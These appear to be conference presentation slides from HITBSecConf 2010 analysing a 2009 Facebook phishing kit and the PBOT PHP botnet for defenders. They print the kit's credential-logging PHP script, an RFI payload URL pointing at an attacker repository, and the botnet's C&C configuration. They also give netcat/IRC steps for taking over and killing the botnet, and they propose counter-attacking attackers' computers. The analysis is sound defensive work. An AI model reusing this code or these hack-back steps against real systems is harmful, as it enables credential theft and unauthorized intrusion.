hitbsecconf 1conference.hitb.org/hitbsecconf2010kul/materials/d1t2 - laurent oudot... ·...

© TEHTRI-Security 2 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010

Speaker

  Laurent OUDOT –  Founder & CEO of TEHTRI-Security (2010) –  Senior Security Expert

•  When ? 15 years of IT Security •  What ? Hardening, pentests... •  Where ? On networks and systems of highly sensitive places:

French Nuclear Warhead Program, United Nations, French Ministry of Defense…

–  Research on defensive & offensive technologies •  Past: Member of the team RstAck & of the Steering Committee of the

Honeynet Research Alliance... •  Frequent presenter and instructor at computer security and

academic conferences like Cansecwest, Pacsec, BlackHat USA-Asia-Europe, HITB Dubai-Amsterdam, US DoD/US DoE, Defcon, Hope, Honeynet, PH-Neutral, Hack.LU

•  Contributor to several research papers for SecurityFocus, MISC Magazine, IEEE, etc.


About TEHTRI-Security

  Company created in April 2010   Cutting-edge technologies –  Advanced & Technical Consulting –  Penetration Tests / Audits… –  Fighting Information Leaks, Counter-Intelligence…

  Worldwide: Conferences, Training, Consulting –  Canada, Lebanon, United Arab Emirates, Singapore,

Netherlands, China, Malaysia, France...   Around 30 public security advisories (6 months)

  International Press / Media


Introduction

  Goal: Analyze recent web attacks that targeted a huge number of people or servers

- End-users - Web servers Find & propose innovative solutions

  Target audience: –  White hats, people who fight Cybercrime, Business

Intelligence & Information Warfare

  Notice: –  Legal Issues: we remind you to carefully respect the

laws in your country before applying some techniques shown in this presentation (striking back, etc).


Plan

1 – About the Attacks 2 – Finding Counter-Measures 3 – Real Life Examples


1. ABOUT THE ATTACKS Let’s have a look at some of those threats


Targeting the internet end-users

  Simple example of action   Phase 1: Compromise a web server and

add an evil payload on it – Client-side attack (exploit kit) •  Goal: compromise workstations

– Pharming (password/data recorder) •  Goal: steal sensitive data (credit card, passwd…)

  Phase 2: Invite victims – Pown servers and send emails to tons of

end users (future potential victims) – Wait for them to connect & get trapped


Targeting random web servers

  Phase 1: Identify a vector of intrusion that could be used against multiple servers during an offensive campaign – E.g.: Easy Remote File Include against a widely

spread web application   Phase 2: Compromise servers to launch

the massive attack from there – E.g.: Target random servers or use Search

Engines to find targets   Phase 3: Wait for servers to be

compromised and abuse them – E.g.: Create a Botnet containing web servers,

and use them to start evil activities (DDOS…)


Hiding such evil activities

  Automatic & standalone tools and methods that attack & spread themselves directly – Kind of evil cyber life that works alone to

compromise servers, etc   Multiple bounces – They have access to many compromised

servers which allows them to bounce and then sometimes hide their addresses, etc

  Timeline –  “Quick Wins” – Short period of attacks but multiple attacks


2. FINDING COUNTER-MEASURES


Finding Counter-Measures

  To protect against such massive web attacks, we need to improve some fields

  Detection –  Improving web based intrusion detection

  Protection/Containment –  Improving hardening of web servers

  Active Response –  Identify the attackers, –  Identify the human targeted, –  Counter-attack…

  Internet contains millions of web sites that can be compromised easily –  Such massive web attacks will still exist for a while


LIVE REVIEW OF EVIL SOURCE CODE

Let’s have a look at some sources stolen to some web attackers


3. REAL LIFE EXAMPLES

And now let’s have a look at two major threats 3.1 will focus on pharming against social networks 3.2 will focus on botnet with web sites included as zombies


3.1 PHARMING ATTACK AGAINST FACEBOOK

Here is an example about how to handle an unknown pharming attempt. The example will focus on a real attack that happened in 2009, against Facebook.


Pharming against Facebook

  Phishing attack with tons of emails sent asking to login facebook

  Fake facebook portal recording emails and passwords

FAKE FACEBOOK LOGIN PAGE (SOURCE)

Fake Facebook Page : HTML sent

  Here is the fake Facebook login page that was hosted on some compromised web servers

  This HTML (javascript) code was sent to the incoming clients, thinking they were on Facebook

<script>!!</script>!


This javascript generates HTML

  It contains the fake login FORM   This FORM sends the HTTP Client to « write.php » which is

hosted on the same compromized computer !<form method="GET" action="write.php" id="https://login.facebook.com/login.php?login_attempt=1">!

  When a victim tries to log in, here is the GET request sent to « write.php » !http://compromizedhost.tld/fake-facebook/write.php?charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fb_dtsg=&version=1.0&return_session=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&[email protected]&pass=oldsecret!


Behavior of “write.php”

  Once someone sends his login/password, he is redirected to another web page, which is the real Facebook page

  The end used, will then have to login (again ?) on the real facebook page –  This is not really stealth, but many end users just thought

there were an temporary error   HTTP packet sent by « write.php »

HTTP/1.1 302 Found!Date: Tue, 28 April 2009 07:13:12 GMT!Server: Apache/2.0 (Unix) PHP/4.3!X-Powered-By: PHP/4.3!Location: http://www.facebook.com/login.php!Content-Length: 0!Keep-Alive: timeout=5, max=100!Connection: Keep-Alive!Content-Type: text/html!


Was it stealth on Facebook’s side ?

  The fake Facebook webpage contained references to resources (images, javascript...) hosted on facebook infrastructure, like: –  http://static.ak.fbcdn.net/favicon.ico?8:132011!–  http://b.static.ak.fbcdn.net/rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js!

– ...   Thanks to the REFERER sent by (most)

Web clients, it was possible to get the URL of the pharming kit against FB


What was possible then ?

  Contact the webmasters / admins of the compromized sites used to host the evil facebook fishing script

  And ask them to send the files involved for further analysis – 3 files found •  index.htm Fake Login Web Page •  write.php Password recorder+302 redirector •  passes.txt ALL THE STOLEN PASSWORDS


Analyzing “write.php”

  PHP Script that records any GET arguments (cleartext output) !<?php!header("Location: http://www.facebook.com/login.php");!$handle = fopen("passes.txt", "a");!foreach($_GET as $variable => $value)!{!fwrite($handle, $variable);!fwrite($handle, "=");!fwrite($handle, $value);!fwrite($handle, "\r\n");!}!fwrite($handle, "\r\n");!fclose($handle);!exit();!?>!


So, what contained “passes.txt” ?

  It contained the email / passwords of any end users who thought it was a real email from Facebook...

  Example ...!charset_test=€,´,€,´,水,Д,Є !fb_dtsg= !version=1.0 !return_session=0 [email protected]!pass=oldsecret!...!


What could be done then ?

  Containment –  Any email address compromised could be “blocked”,

and the end-user could be contacted, by asking for a new password to be set

  Track the attackers –  The webmasters / admins of the compromised web

server that hosted the pharming script, could help with the logs of the site

–  Good questions: •  Who asked for “passes.txt” ? IP address of attackers •  When ? Look at the different dates •  How many Facebook end-users were compromised…?

–  Size of bytes sent ? •  A.B.C.D - - [28/Apr/2009:17:07:47 +0200] "GET /..../

passes.txt HTTP/1.1" 200 194 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

•  Here we have to look at the users included in first 194 bytes


Innovative solution?

  Tiny-Offensive solution for FB if they don’t have the help of the compromised hoster –  For each resource (pictures) asked by clients coming

from the compromised host (see REFERER) just send big fake pictures in RED with Security Notice

  Semi-Offensive solution that could be tried by Facebook (Trap !) –  “Handle” the accounts compromised on FB –  Add fake accounts on FB –  Log anything related to those accounts on FB –  Add those accounts in “passes.txt” –  Wait for the attackers to read that file –  Each time they connect on the fake accounts, it’s more

time to gather more info about them (law enforcement possibilities, etc)


More innovative solution?

  Example of an offensive solution that could be tried by FB: –  Change “passes.txt” so that the attackers are sent to another

page for counter-attack plans (intrusion on attackers’ comp or identify them) $ rm passes.txt; cat > passes.txt.php !

<?php header("Location: http://malicious-site/anti-attackers/"); ?>!

–  Samples for such a session from an attacker GET /malware/fb/passes.txt HTTP/1.1!

Host: compromised-hosting-server!

User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) Firefox/3.6!

Accept: text/html,application/xhtml+xml,application/xml!

HTTP/1.1 302 Found!

Server: Apache/2.2.14 (Unix) OpenSSL/0.9.8l DAV/2 PHP/5.3.1!

Location: http://malicious-site/anti-attackers/!


3.2 WEB BASED BOTNET

Here is an example of a technique that creates a botnet full of web servers…


Adding Web Sites into a Botnet MASSIVE ATTACKS

COMMAND & CONTROL CHANNEL

MASSIVEORDERS

FINAL ACTION (e.g.: DDOS) Web sites


PBOT: The PHP Botnet

  RFI Attackers – Automatic Web Scan

against PHP   If a PHP site is

vulnerable to a RFI, the web server is turned into a zombie with PBOT

  IRC Command & Control –  Login / Password – Many actions

proposed


Hunting PBOT, PHP BotNet

  Phase 1: Identify a PBOT Attack –  Analyze your logs (web server) –  Find RFI (Remote File Include) tests

and check if it’s a PBOT http://www.yoursite.tld/yourscript.php?

yourargument1=http://ownedbox.tld/evilrepository/payload.txt?!

  Phase 2: Analyze source code and retrieve sensitive information –  IRC Server, Port, Password,

Channel... –  Version of PBOT, Protocol used (e.g.

over IRCII PRIVMSG), Internal Password...

  Phase 3: Counter-Attack –  Infiltrate the Botnet –  Identify the compromized

computers (to alert the CERTs, Administrators, host owners, etc)

–  Kill Pbot

  Sample from the source code

class pBot !{ !var $config = array(!

!"server"=>"a.b.c.d", !!"port"=>6669, !!"pass"=>"", //senha do server!!"prefix"=>"owned|", !

"maxrand"=>8, !!"chan"=>"#pbotchannel", !!"key"=>"oxi", //senha do canal!

!"modes"=>"+p", !!"password"=>"l33tP4sS", //senha do bot!!"trigger"=>".", !!"hostauth"=>"*" // * for any hostname !

); !


Infiltrate the Botnet

  How to connect to the remote IRC Server –  Use the native PHP code from Pbot (which become a

PHP Client Honeypot) or modify it, –  Or sometimes use an IRC Client or by hand

  Example by hand (safe) –  Connect

•  nc -nvv a.b.c.d 6669 –  Send your yousername + nickname

•  USER ownedolsyezun 127.0.0.1 localhost :ownedolsyezun •  NICK owned|34944893

–  If you get a PING, reply with the PONG •  PONG :xxxxxxxx

–  Join the channel of the Zombies... •  JOIN #pbotchannel oxi

–  Become administrator of any zombie of this Botnet •  PRIVMSG #pbotchannel :.user l33tP4sS


Identify who is infected

  Use their command & control channel –  PRIVMSG #pbotchannel :.info

:owned|[email protected] PRIVMSG #pbotchannel :[Vuln!]: http://www.xxxxx/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??]!  Nickname, username of the Zombie (Random)

  :owned|86540828!~ownedjzytf

  IP, Hostname of the zombie   x.a.b.c

  PHP Script that is vulnerable to an RFI!  http://www.xxxxx/index.php!

  PHP Script that is vulnerable to an RFI!  _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid

%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??

  PBOT Repository that was used for this infection   http://a.b.c.d/evil??!


Kill the BotNet

  How to ask all the bot on the channel to die ? case "die":! ! ! // MESSAGE USED ON THE COMMAND & CONTROL CENTER !

!$this->send("QUIT :MORRI! comando por $nick"); // OUTPUT SENT ON THE CHANNEL!!fclose($this->conn); !// CLOSE THE FILE DESCRIPTOR (SOCKET) FOR THIS SESSION !!exit;! ! ! ! // AND EXIT !

  Broadcast this command to any bot in the channel –  PRIVMSG #pbotchannel :.die

  Stealth alternative: direct PRIVMSG to any zombie...   Output retrieved through such a command

–  You see all the different zombies dying...!:owned|[email protected] QUIT :Read error: EOF from client!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!

:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!

...!


LIVE REVIEW OF EVIL SOURCE CODE

Let’s have a look at some sources stolen to some web attackers


CONCLUSION


Conclusion

  Massive web attacks –  It’s simple –  It’s cheap –  It happens now –  But the IT Security world don’t talk too much

about those threats (not enough technical ?) •  They prefer to focus on threats that happen in laboratories

(super futuristic exploits, etc)

  Improve monitoring & Take a look at your logs –  Track down the attackers –  Steal their tools –  Share your findings –  Improve Internet Security

  “Life is short, Play hard”


This is not a game. ��

Take care. Thanks.

www.tehtri-security.com

Contact TEHTRI-Security When you catch a web malware…

When you need technical assistance… Meet TEHTRI-Security Ask for our trainings…

web (at) tehtri-security (dot) com

hitbsecconf 1conference.hitb.org/hitbsecconf2010kul/materials/d1t2 - laurent oudot... ·...

Documents